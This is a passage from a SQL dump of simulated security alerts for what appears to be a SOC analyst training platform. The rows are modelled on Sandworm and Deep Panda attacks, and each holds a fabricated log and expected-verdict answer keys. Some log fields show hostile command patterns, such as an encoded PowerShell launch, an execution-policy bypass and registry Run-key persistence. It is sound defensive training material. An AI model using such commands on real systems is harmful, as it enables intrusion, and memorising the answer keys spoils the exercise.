2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(782, 'Lateral Movement to SCADA Systems', 'critical', 'Network traffic analysis', 'With elevated privileges, Sandworm moved laterally across the network to access SCADA systems, setting the stage for the eventual power disruption.', 'Lateral Movement', 'T1570 - Lateral Tool Transfer', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.50\",\"external_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"accessed_system\":\"SCADA-Controller-01\",\"malware_filename\":\"olympic_destroyer.exe\",\"malware_hash\":\"3f5d1e7ccb4e7c8b8e77d8f7fbcf4f0d\",\"event\":\"Lateral movement detected\",\"protocol\":\"SMB\",\"action\":\"Access to SCADA systems\"}', '2026-01-11 23:37:37', '2026-02-16 18:01:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Critical SCADA system IP\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"public\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm activity\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"olympic_destroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Olympic Destroyer malware variant\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f5d1e7ccb4e7c8b8e77d8f7fbcf4f0d\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Olympic Destroyer malware hash\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(783, 'Deployment of KillDisk Wiper', 'critical', 'Disk forensics', 'In the final stage, Sandworm deployed KillDisk, a destructive wiper, on targeted systems. This attack erased crucial data, complicating recovery and prolonging the blackout.', 'Destructive Attack', 'T1485 - Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:32Z\",\"event_id\":\"wiper-attack-001\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.45\",\"hash\":\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\",\"file_name\":\"killdisk.exe\",\"user_account\":\"admin_sandworm\",\"action\":\"file_deletion\",\"status\":\"success\",\"description\":\"KillDisk wiper executed and erased data on the targeted system.\"}', '2026-01-11 23:37:37', '2026-02-16 18:01:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Sandworm operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with KillDisk malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"killdisk.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable file used for data wiping.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_sandworm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised by Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(784, 'Phishing Campaign Detected', 'high', 'Email Gateway Logs', 'Deep Panda initiates the attack by sending spear-phishing emails to Anthem\'s IT administrators, aiming to harvest credentials and gain a foothold into the network.', 'Social Engineering', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"email_subject\":\"Urgent: Account Verification Required\",\"sender_email\":\"support@anthen-security.com\",\"recipient_email\":\"admin@anthem.com\",\"attachment_name\":\"Invoice_Details.doc\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malicious_links\":[\"http://malicious-link.com/verify\"],\"attachment_action\":\"Downloaded\"}', '2026-01-11 23:42:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP associated with APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@anthen-security.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Spoofed email address used in phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious document\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious-link.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Phishing URL used to collect credentials\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Campaign Detected\",\"date\":\"2026-02-01T20:32:22.432Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(785, 'Suspicious Execution of Derusbi Malware', 'high', 'Endpoint Detection and Response (EDR) System', 'The EDR system detected the execution of the Derusbi malware on an internal endpoint. This activity follows a successful credential harvesting attempt. The malware is known for establishing persistence and conducting reconnaissance.', 'Malware Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:12Z\",\"event_id\":\"12345\",\"hostname\":\"compromised-host.internal\",\"username\":\"jdoe\",\"src_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"malware_name\":\"Derusbi\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\derusbi.exe\",\"file_hash\":\"a7b9c3d4e5f67890123456789abcdef1234567890123456789abcdef12345678\",\"process_id\":5432,\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\derusbi.exe\",\"behavior\":\"Persistence Mechanism\",\"network_activity\":{\"destination_ip\":\"203.0.113.45\",\"destination_port\":443}}', '2026-01-11 23:42:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a7b9c3d4e5f67890123456789abcdef1234567890123456789abcdef12345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Derusbi malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"derusbi.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable linked to Derusbi malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(786, 'Persistence Mechanism Identified', 'high', 'Registry and Scheduled Tasks Monitoring', 'The attackers embed themselves within the network, creating persistent backdoors that allow them to remain undetected while they continue their operations. A scheduled task was discovered on host 192.168.1.15 that executes a malicious script to maintain persistence. Additionally, a suspicious registry key modification was detected.', 'Persistence', 'T1053 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"host\":\"192.168.1.15\",\"user\":\"compromised_user\",\"task_name\":\"UpdateChecker\",\"task_path\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\UpdateChecker\",\"task_command\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\scripts\\\\update.ps1\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"registry_value\":\"C:\\\\malware\\\\malicious.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"attacker_ip\":\"203.0.113.45\"}', '2026-01-11 23:42:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a known malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.434Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:00Z\\\",\\\"host\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"task_name\\\":\\\"UpdateChecker\\\",\\\"task_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\UpdateChecker\\\",\\\"task_command\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\scripts\\\\\\\\update.ps1\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\malware\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(787, 'Lateral Movement Traced', 'high', 'Network Traffic Analysis', 'Deep Panda identified conducting internal reconnaissance to map network and locate critical databases. Movement detected from 10.0.0.45 to 192.168.1.100, targeting database server containing sensitive patient records.', 'Internal Reconnaissance', 'T1046', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:28Z\",\"source_ip\":\"10.0.0.45\",\"destination_ip\":\"192.168.1.100\",\"malicious_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"Lateral Movement Detected\",\"protocol\":\"SMB\",\"filename\":\"db_script.ps1\",\"action\":\"Access Attempted\",\"result\":\"Success\"}', '2026-01-11 23:42:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted database server.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Deep Panda.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by Deep Panda.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"db_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Script file used during lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(788, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Systems', 'Anomalous data transfer detected from internal network to an external IP, indicating the extraction of unencrypted patient data from Anthem\'s database.', 'Data Exfiltration', 'T1020: Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.1.2.45\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"patient_data_extract.csv\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"transfer_size\":\"15MB\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"alert_id\":\"DLP-2023-5678\"}', '2026-01-11 23:42:29', '2026-02-16 18:00:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known 